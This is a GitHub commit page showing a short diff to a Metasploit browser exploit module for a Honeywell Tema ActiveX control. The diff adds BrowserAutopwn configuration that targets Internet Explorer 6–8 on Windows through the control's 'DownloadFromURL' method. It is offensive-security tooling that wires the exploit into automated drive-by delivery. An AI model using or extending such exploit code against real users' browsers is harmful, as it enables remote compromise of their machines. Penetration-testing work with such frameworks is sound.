We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 0e475df commit 52982c0Copy full SHA for 52982c0
modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -13,6 +13,18 @@ class Metasploit3 < Msf::Exploit::Remote
13
include Msf::Exploit::Remote::HttpServer::HTML
14
include Msf::Exploit::EXE
15
include Msf::Exploit::FileDropper
16
+ include Msf::Exploit::Remote::BrowserAutopwn
17
+
18
+ autopwn_info({
19
+ :ua_name => HttpClients::IE,
20
+ :ua_minver => "6.0",
21
+ :ua_maxver => "8.0",
22
+ :javascript => true,
23
+ :os_name => OperatingSystems::WINDOWS,
24
+ :rank => NormalRanking,
25
+ :classid => "{E01DF79C-BE0C-4999-9B13-B5F7B2306E9B}",
26
+ :method => "DownloadFromURL"
27
+ })
28
29
def initialize(info={})
30
super(update_info(info,
0 commit comments